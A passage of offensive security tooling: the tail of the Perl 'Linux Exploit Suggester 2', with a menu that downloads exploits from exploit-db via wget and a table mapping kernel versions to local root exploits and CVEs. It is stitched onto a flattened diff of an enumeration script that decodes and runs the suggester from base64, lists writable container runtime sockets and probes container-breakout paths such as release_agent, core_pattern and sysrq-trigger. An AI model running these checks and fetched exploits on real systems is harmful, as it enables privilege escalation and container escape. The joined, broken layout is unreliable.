        next if (!defined $mil);
        my ($exploit_num) = ($mil =~ /^.*\/([1-9][0-9]*)\/?$/);
        
        if ($exploit_num && index($mil, $exploit_base) != -1) {
            my $url = $download_base . $exploit_num;
            my $file = "exploit_$applicable[$num-1]{key}";
            print "  Downloading \e[00;33m$url\e[00m -> \e[00;33m$file\e[00m\n";
            system "wget $url -O $file > /dev/null 2>&1";
        }
        else {
            print "  No exploit code available for \e[00;33m$applicable[$num-1]{key}\e[00m\n"; 
        }
    }
    print "\n";
}

sub uniq {
    my %seen;
    grep !$seen{$_}++, @_;
}

sub usage {
print_banner();
print "  \e[00;35mUsage:\e[00m $0 [-h] [-k kernel] [-d]\n\n";
print "  \e[00;33m[\e[00m\e[00;31m-h\e[00m\e[00;33m]\e[00m Help (this message)\n";
print "  \e[00;33m[\e[00m\e[00;31m-k\e[00m\e[00;33m]\e[00m Kernel number (eg. 2.6.28)\n";
print "  \e[00;33m[\e[00m\e[00;31m-d\e[00m\e[00;33m]\e[00m Open exploit download menu\n\n";

print "  You can also provide a partial kernel version (eg. 2.4)\n";
print "  to see all exploits available.\n\n";
}

sub print_banner {
print "\n\e[00;33m  #############################\e[00m\n";
print "\e[1;31m    Linux Exploit Suggester $VERSION\e[00m\n";
print "\e[00;33m  #############################\e[00m\n\n";
}

sub get_exploits {
  return (
    'w00t' => {
        vuln => [
            '2.4.10', '2.4.16', '2.4.17', '2.4.18',
            '2.4.19', '2.4.20', '2.4.21',
        ]
    },
    'brk' => {
        vuln => [ '2.4.10', '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
    },
    'ave' => { vuln => [ '2.4.19', '2.4.20' ] },

    'elflbl' => {
        vuln => ['2.4.29'],
        mil  => 'http://www.exploit-db.com/exploits/744',
    },

    'elfdump'      => { vuln => ['2.4.27'] },
    'elfcd'        => { vuln => ['2.6.12'] },
    'expand_stack' => { vuln => ['2.4.29'] },

    'h00lyshit' => {
        vuln => [
            '2.6.8',  '2.6.10', '2.6.11', '2.6.12',
            '2.6.13', '2.6.14', '2.6.15', '2.6.16',
        ],
        cve => '2006-3626',
        mil => 'http://www.exploit-db.com/exploits/2013',
    },

    'kdump' => { vuln => ['2.6.13'] },
    'km2'   => { vuln => [ '2.4.18', '2.4.22' ] },
    'krad' =>
      { vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ] },

    'krad3' => {
        vuln => [ '2.6.5', '2.6.7', '2.6.8', '2.6.9', '2.6.10', '2.6.11' ],
        mil => 'http://exploit-db.com/exploits/1397',
    },

    'local26' => { vuln => ['2.6.13'] },
    'loko'    => { vuln => [ '2.4.22', '2.4.23', '2.4.24' ] },

    'mremap_pte' => {
        vuln => [ '2.4.20', '2.2.24', '2.4.25', '2.4.26', '2.4.27' ],
        mil => 'http://www.exploit-db.com/exploits/160',
    },

    'newlocal' => { vuln => [ '2.4.17', '2.4.19' ] },
    'ong_bak'  => { vuln => ['2.6.5'] },
    'ptrace' =>
      { vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ] },
    'ptrace_kmod' => {
        vuln => [ '2.4.18', '2.4.19', '2.4.20', '2.4.21', '2.4.22' ],
        cve  => '2007-4573',
    },
    'ptrace_kmod2' => {
        vuln => [
            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31',
            '2.6.32', '2.6.33', '2.6.34',
        ],
        alt => 'ia32syscall,robert_you_suck',
        mil => 'http://www.exploit-db.com/exploits/15023',
        cve => '2010-3301',
    },
    'ptrace24' => { vuln => ['2.4.9'] },
    'pwned'    => { vuln => ['2.6.11'] },
    'py2'      => { vuln => [ '2.6.9', '2.6.17', '2.6.15', '2.6.13' ] },
    'raptor_prctl' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        cve  => '2006-2451',
        mil => 'http://www.exploit-db.com/exploits/2031',
    },
    'prctl' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2004',
    },
    'prctl2' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2005',
    },
    'prctl3' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2006',
    },
    'prctl4' => {
        vuln => [ '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17' ],
        mil => 'http://www.exploit-db.com/exploits/2011',
    },
    'remap'      => { vuln => ['2.4'] },
    'rip'        => { vuln => ['2.2'] },
    'stackgrow2' => { vuln => [ '2.4.29', '2.6.10' ] },
    'uselib24' => {
        vuln => [ '2.6.10', '2.4.17', '2.4.22', '2.4.25', '2.4.27', '2.4.29' ]
    },
    'newsmp'   => { vuln => ['2.6'] },
    'smpracer' => { vuln => ['2.4.29'] },
    'loginx'   => { vuln => ['2.4.22'] },
    'exp.sh'   => { vuln => [ '2.6.9', '2.6.10', '2.6.16', '2.6.13' ] },
    'vmsplice1' => {
        vuln => [
            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
            '2.6.23', '2.6.24', '2.6.24.1',
        ],
        alt => 'jessica biel',
        cve => '2008-0600',
        mil => 'http://www.exploit-db.com/exploits/5092',
    },
    'vmsplice2' => {
        vuln => [ '2.6.23', '2.6.24' ],
        alt  => 'diane_lane',
        cve  => '2008-0600',
        mil  => 'http://www.exploit-db.com/exploits/5093',
    },
    'vconsole' => {
        vuln => ['2.6'],
        cve  => '2009-1046',
    },
    'sctp' => {
        vuln => ['2.6.26'],
        cve  => '2008-4113',
    },
    'ftrex' => {
        vuln => [
            '2.6.11', '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16',
            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
        ],
        cve => '2008-4210',
        mil => 'http://www.exploit-db.com/exploits/6851',
    },
    'exit_notify' => {
        vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
        mil => 'http://www.exploit-db.com/exploits/8369',
    },
    'udev' => {
        vuln => [ '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29' ],
        alt  => 'udev <1.4.1',
        cve  => '2009-1185',
        mil => 'http://www.exploit-db.com/exploits/8478',
    },

    'sock_sendpage2' => {
        vuln => [
            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0',  '2.6.1',
            '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',  '2.6.7',
            '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12', '2.6.13',
            '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
            '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
        ],
        alt => 'proto_ops',
        cve => '2009-2692',
        mil => 'http://www.exploit-db.com/exploits/9436',
    },

    'sock_sendpage' => {
        vuln => [
            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.0',  '2.6.1',
            '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',  '2.6.7',
            '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12', '2.6.13',
            '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18', '2.6.19',
            '2.6.20', '2.6.21', '2.6.22', '2.6.23', '2.6.24', '2.6.25',
            '2.6.26', '2.6.27', '2.6.28', '2.6.29', '2.6.30',
        ],
        alt => 'wunderbar_emporium',
        cve => '2009-2692',
        mil => 'http://www.exploit-db.com/exploits/9435',
    },
    'udp_sendmsg_32bit' => {
        vuln => [
            '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',  '2.6.6',
            '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11', '2.6.12',
            '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17', '2.6.18',
            '2.6.19',
        ],
        cve => '2009-2698',
        mil =>
          'http://downloads.securityfocus.com/vulnerabilities/exploits/36108.c',
    },
    'pipe.c_32bit' => {
        vuln => [
            '2.4.4',  '2.4.5',  '2.4.6',  '2.4.7',  '2.4.8',  '2.4.9',
            '2.4.10', '2.4.11', '2.4.12', '2.4.13', '2.4.14', '2.4.15',
            '2.4.16', '2.4.17', '2.4.18', '2.4.19', '2.4.20', '2.4.21',
            '2.4.22', '2.4.23', '2.4.24', '2.4.25', '2.4.26', '2.4.27',
            '2.4.28', '2.4.29', '2.4.30', '2.4.31', '2.4.32', '2.4.33',
            '2.4.34', '2.4.35', '2.4.36', '2.4.37', '2.6.15', '2.6.16',
            '2.6.17', '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22',
            '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28',
            '2.6.29', '2.6.30', '2.6.31',
        ],
        cve => '2009-3547',
        mil =>
          'http://www.securityfocus.com/data/vulnerabilities/exploits/36901-1.c',
    },
    'do_pages_move' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31',
        ],
        alt => 'sieve',
        cve => '2010-0415',
        mil => 'Spenders Enlightenment',
    },
    'reiserfs' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
        ],
        cve => '2010-1146',
        mil => 'http://www.exploit-db.com/exploits/12130',
    },
    'can_bcm' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        cve => '2010-2959',
        mil => 'http://www.exploit-db.com/exploits/14814',
    },
    'rds' => {
        vuln => [
            '2.6.30', '2.6.31', '2.6.32', '2.6.33',
            '2.6.34', '2.6.35', '2.6.36',
        ],
        mil => 'http://www.exploit-db.com/exploits/15285',
        cve => '2010-3904',
    },
    'half_nelson1' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        alt => 'econet',
        cve => '2010-3848',
        mil => 'http://www.exploit-db.com/exploits/17787',
    },
    'half_nelson2' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        alt => 'econet',
        cve => '2010-3850',
        mil => 'http://www.exploit-db.com/exploits/17787',
    },
    'half_nelson3' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        alt => 'econet',
        cve => '2010-4073',
        mil => 'http://www.exploit-db.com/exploits/17787',
    },
    'caps_to_root' => {
        vuln => [ '2.6.34', '2.6.35', '2.6.36' ],
        cve  => 'n/a',
        mil => 'http://www.exploit-db.com/exploits/15916',
    },
    'american-sign-language' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        cve => '2010-4347',
        mil => 'http://www.securityfocus.com/bid/45408',
    },
    'pktcdvd' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35',
            '2.6.36',
        ],
        cve => '2010-3437',
        mil => 'http://www.exploit-db.com/exploits/15150',
    },
    'video4linux' => {
        vuln => [
            '2.6.0',  '2.6.1',  '2.6.2',  '2.6.3',  '2.6.4',  '2.6.5',
            '2.6.6',  '2.6.7',  '2.6.8',  '2.6.9',  '2.6.10', '2.6.11',
            '2.6.12', '2.6.13', '2.6.14', '2.6.15', '2.6.16', '2.6.17',
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.28', '2.6.29',
            '2.6.30', '2.6.31', '2.6.32', '2.6.33',
        ],
        cve => '2010-3081',
        mil => 'http://www.exploit-db.com/exploits/15024',
    },
    'memodipper' => {
        vuln => [
            '2.6.39', '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4',
            '3.0.5',  '3.0.6', '3.1.0',
        ],
        cve => '2012-0056',
        mil => 'http://www.exploit-db.com/exploits/18411',
    },
    'semtex' => {
        vuln => [
            '2.6.37', '2.6.38', '2.6.39', '3.0.0', '3.0.1', '3.0.2',
            '3.0.3',  '3.0.4',  '3.0.5',  '3.0.6', '3.1.0',
        ],
        cve => '2013-2094',
        mil => 'http://www.exploit-db.com/exploits/25444',
    },
    'perf_swevent' => {
        vuln => [
            '3.0.0', '3.0.1', '3.0.2', '3.0.3', '3.0.4', '3.0.5',
            '3.0.6', '3.1.0', '3.2.0', '3.3.0', '3.4.0', '3.4.1',
            '3.4.2', '3.4.3', '3.4.4', '3.4.5', '3.4.6', '3.4.8',
            '3.4.9', '3.5.0', '3.6.0', '3.7.0', '3.8.0', '3.8.1',
            '3.8.2', '3.8.3', '3.8.4', '3.8.5', '3.8.6', '3.8.7',
            '3.8.8', '3.8.9',
        ],
        cve => '2013-2094',
        mil => 'http://www.exploit-db.com/exploits/26131',
    },
    'msr' => {
        vuln => [
            '2.6.18', '2.6.19', '2.6.20', '2.6.21', '2.6.22', '2.6.23',
            '2.6.24', '2.6.25', '2.6.26', '2.6.27', '2.6.27', '2.6.28',
            '2.6.29', '2.6.30', '2.6.31', '2.6.32', '2.6.33', '2.6.34',
            '2.6.35', '2.6.36', '2.6.37', '2.6.38', '2.6.39', '3.0.0',
            '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',  '3.0.5',  '3.0.6',
            '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',  '3.5.0',  '3.6.0',
            '3.7.0',  '3.7.6',
        ],
        cve => '2013-0268',
        mil => 'http://www.exploit-db.com/exploits/27297',
    },
    'timeoutpwn' => {
        vuln => [
            '3.4.0',  '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.9', 
            '3.9.0',  '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.4.0',
            '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.5',  '3.8.6',  
            '3.8.9',  '3.9.0',  '3.9.6',  '3.10.0', '3.10.6', '3.11.0',
            '3.12.0', '3.13.0', '3.13.1'
        ],
        cve => '2014-0038',
        mil => 'http://www.exploit-db.com/exploits/31346',
    },
    'rawmodePTY' => {
        vuln => [
            '2.6.31', '2.6.32', '2.6.33', '2.6.34', '2.6.35', '2.6.36',
            '2.6.37', '2.6.38', '2.6.39', '3.14.0', '3.15.0'
        ],
        cve => '2014-0196',
        mil => 'http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c',
    },
    'overlayfs' => {
        vuln => [
            '3.13.0', '3.16.0', '3.19.0'
        ],
        cve => '2015-8660',
        mil => 'http://www.exploit-db.com/exploits/39230',
    },
    'pp_key' => {
        vuln => [
			'3.4.0',  '3.5.0',  '3.6.0',  '3.7.0',  '3.8.0',  '3.8.1',  
            '3.8.2',  '3.8.3',  '3.8.4',  '3.8.5',  '3.8.6',  '3.8.7',  
            '3.8.8',  '3.8.9',  '3.9.0',  '3.9.6',  '3.10.0', '3.10.6', 
            '3.11.0', '3.12.0', '3.13.0', '3.13.1'
        ],
        cve => '2016-0728',
        mil => 'http://www.exploit-db.com/exploits/39277',
    },
    'dirty_cow' => {
        vuln => [
            '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27', 
			'2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32', 
            '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38', 
            '2.6.39', '3.0.0',  '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',  
            '3.0.5',  '3.0.6',  '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',  
            '3.5.0',  '3.6.0',  '3.7.0',  '3.7.6',  '3.8.0',  '3.9.0'
        ],
        cve => '2016-5195',
        mil => 'http://www.exploit-db.com/exploits/40616',
    },
    'af_packet' => {
        vuln => ['4.4.0' ],
        cve => '2016-8655',
        mil => 'http://www.exploit-db.com/exploits/40871',
    },
    'packet_set_ring' => {
        vuln => ['4.8.0' ],
        cve => '2017-7308',
        mil => 'http://www.exploit-db.com/exploits/41994',
    },
    'clone_newuser' => {
        vuln => [
            '3.3.5', '3.3.4', '3.3.2', '3.2.13', '3.2.9', '3.2.1', 
            '3.1.8', '3.0.5', '3.0.4', '3.0.2', '3.0.1', '3.2', '3.0.1', '3.0'
        ],
        cve => 'N\A',
        mil => 'http://www.exploit-db.com/exploits/38390',
    },
    'get_rekt' => {
        vuln => [
            '4.4.0', '4.8.0', '4.10.0', '4.13.0'
        ],
        cve => '2017-16695',
        mil => 'http://www.exploit-db.com/exploits/45010',
    },
    'exploit_x' => {
        vuln => [
            '2.6.22', '2.6.23', '2.6.24', '2.6.25', '2.6.26', '2.6.27',
            '2.6.27', '2.6.28', '2.6.29', '2.6.30', '2.6.31', '2.6.32',
            '2.6.33', '2.6.34', '2.6.35', '2.6.36', '2.6.37', '2.6.38',
            '2.6.39', '3.0.0',  '3.0.1',  '3.0.2',  '3.0.3',  '3.0.4',
            '3.0.5',  '3.0.6',  '3.1.0',  '3.2.0',  '3.3.0',  '3.4.0',
            '3.5.0',  '3.6.0',  '3.7.0',  '3.7.6',  '3.8.0',  '3.9.0',
            '3.10.0', '3.11.0', '3.12.0', '3.13.0', '3.14.0', '3.15.0',
            '3.16.0', '3.17.0', '3.18.0', '3.19.0', '4.0.0',  '4.1.0',
            '4.2.0',  '4.3.0',  '4.4.0',  '4.5.0',  '4.6.0',  '4.7.0'
        ],
        cve => '2018-14665',
        mil => 'http://www.exploit-db.com/exploits/45697',
    },
  );
}

__END__
=head1 NAME

linux_exploit_suggester-2.pl - A local exploit suggester for linux

=head1 DESCRIPTION

This perl script will enumerate the possible exploits available for a given kernel version

=head1 USAGE

[-h] Help (this message)
[-k] Kernel number (eg. 2.6.28)
[-d] Open exploit download menu

You can also provide a partial kernel version (eg. 2.4)
to see all exploits available.

=head1 AUTHOR

Jonathan Donas (c) 2019

=cut

=head1 LICENSE

 Linux Exploit Suggester 2

 This program is free software; you can redistribute it and/or modify
 it under the terms of the GNU General Public License as published by
 the Free Software Foundation; either version 2 of the License, or
 (at your option) any later version.

 This program is distributed in the hope that it will be useful,
 but WITHOUT ANY WARRANTY; without even the implied warranty of
 MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 GNU General Public License for more details.
        
 You should have received a copy of the GNU General Public License along
 with this program; if not, write to the Free Software Foundation, Inc.,
 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

=cut
" - echo $les2_b64 | base64 -d | perl | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g" + echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g" echo "" fi @@ -1344,6 +1513,22 @@ print_list "Execshield enabled? ............ "$NC print_list "SELinux enabled? ............... "$NC (sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED}," +#-- SY) Seccomp +print_list "Seccomp enabled? ............... "$NC +([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," + +#-- SY) AppArmor +print_list "AppArmor profile? .............. "$NC +(cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN}," + +#-- SY) AppArmor +print_list "User namespace? ................ "$NC +if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi + +#-- SY) cgroup2 +print_list "Cgroup2 enabled? ............... "$NC +([ "$(grep cgroup2 /proc/filesystems)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," + #-- SY) Gatekeeper if [ "$MACPEAS" ]; then print_list "Gatekeeper enabled? .......... "$NC @@ -1423,6 +1608,14 @@ containerCheck() { else containerType="kubernetes\n" fi fi + + # Inside concourse? + if grep "/concourse" /proc/1/mounts -qa 2>/dev/null; then + inContainer="1" + if [ "$containerType" ]; then + containerType="$containerType (concourse)\n" + fi + fi # Are we inside LXC? if env | grep "container=lxc" -qa 2>/dev/null || @@ -1467,27 +1660,33 @@ enumerateDockerSockets() { dockerVersion="$(echo_not_found)" if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then SEARCHED_DOCKER_SOCKETS="1" - for dock_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]; then - echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g" - echo "Docker enummeration:" - docker_enumerated="" + for int_sock in $(find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" -o -name "dockershim.sock" -o -name "containerd.sock" -o -name "crio.sock" -o -name "frakti.sock" -o -name "rktlet.sock" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -w "$int_sock" ]; then + if echo "$int_sock" | grep -Eq "docker"; then + dock_sock="$int_sock" + echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g" + echo "Docker enummeration:" + docker_enumerated="" - if [ "$(command -v curl)" ]; then - sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)" - dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) - echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' - if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi - fi + if [ "$(command -v curl)" ]; then + sockInfoResponse="$(curl -s --unix-socket $dock_sock http://localhost/info)" + dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4) + echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi + fi - if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then - sockInfoResponse="$(docker info)" - dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4) - printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then + sockInfoResponse="$(docker info)" + dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4) + printf "$sockInfoResponse" | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"' + fi + + else + echo "You have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_RED},g" fi else - echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_GREEN},g" + echo "You don't have write permissions over interesting socket $int_sock" | sed -${E} "s,$int_sock,${SED_GREEN},g" fi done fi @@ -1521,6 +1720,39 @@ checkContainerExploits() { fi } +checkProcSysBreakouts(){ + if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then release_agent_breakout1="Yes"; else release_agent_breakout1="No"; fi + + mkdir /tmp/cgroup_3628d4 + mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null + if [ $? -eq 0 ]; then release_agent_breakout2="Yes"; else release_agent_breakout2="No"; fi + rm -rf /tmp/cgroup_3628d4 2>/dev/null + + core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)" + modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` || echo No)" + panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)" + panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)" + binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)" + proc_configgz_readable="$([ -r '/proc/config.gz' ] 2>/dev/null && echo Yes || echo No)" + sysreq_trigger_dos="$( (echo -n '' > /proc/sysrq-trigger && echo Yes) 2>/dev/null || echo No)" + kmsg_readable="$( (dmesg > /dev/null 2>&1 && echo Yes) 2>/dev/null || echo No)" # Kernel Exploit Dev + kallsyms_readable="$( (head -n 1 /proc/kallsyms > /dev/null && echo Yes )2>/dev/null || echo No)" # Kernel Exploit Dev + mem_readable="$( (head -n 1 /proc/self/mem > /dev/null && echo Yes) 2>/dev/null || echo No)" + if [ "$(head -n 1 /tmp/kcore 2>/dev/null)" ]; then kcore_readable="Yes"; else kcore_readable="No"; fi + kmem_readable="$( (head -n 1 /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)" + kmem_writable="$( (echo -n '' > /proc/kmem > /dev/null && echo Yes) 2>/dev/null || echo No)" + mem_readable="$( (head -n 1 /proc/mem > /dev/null && echo Yes) 2>/dev/null || echo No)" + mem_writable="$( (echo -n '' > /proc/mem > /dev/null && echo Yes) 